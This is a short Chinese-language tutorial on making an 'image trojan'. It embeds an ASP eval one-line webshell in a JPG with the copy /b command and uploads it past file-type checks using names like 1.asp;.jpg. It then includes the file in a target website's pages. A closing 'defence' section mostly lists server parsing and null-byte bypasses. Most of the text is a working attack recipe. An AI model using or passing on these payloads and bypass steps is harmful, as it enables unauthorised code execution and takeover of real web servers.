1.利用图片捆绑木马,绕过文件类型判断
有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会把一句话放在图片里面,写成1.asp;.jpg 1.asp;jpg的格式上传上去,这样上传的时候系统检测是图片,然后在上传之后,会把这个文件当asp文件来处理,那么如何用cmd来制作一句话木马呢.
利用copy命令
详细操作为
1.随便找一张图片 名字改成1.jpg(名字改为1.jpg只是为了方便记忆和输入 文件的后缀随意 只要是图片的格式就可以了)
2.<%eval request("keio")%> 存为1.asp(就是一句话木马)
3.copy 1.jpg /b + 1.asp /a 2.jpg 存为1.bat文件
解释一下代码
复制当前目录下的 1.jpg 图片和当前目录下的 1.asp 文件并以ASCII代码的方式合并为 2.jpg 图片
运行 1.bat 就会出现一个图片 2.jpg
而这个2.jpg就是已经做好的木马了
把一句话木马合并到了图片里以后
再把以下代码插入目标网站的任意文件即可
<% #include files="2.jpg"%>
防御方法:主要是防止iis将图片解析成asp,aspx,php等进行执行,图片马是配合解析漏洞或者文件包含才能正常执行,iis之前版本存在解析漏洞
IS6.0 的解析漏洞 :1.jpg%00.php 1.asp;.jpg 1.asp/1.jpg
IIS 7.0/IIS 7.5/ nginx <8.03 畸形解析 1.jpg/.php
Nginx <8.03 空字节代码执行漏洞 1.jpg%00.php
Apache 解析漏洞 .php.一个无效后缀
还有就是 Windows 下的各种截断了,因为 win 环境下不允许一些符号命名文件,所以可以造成截断文件名的效果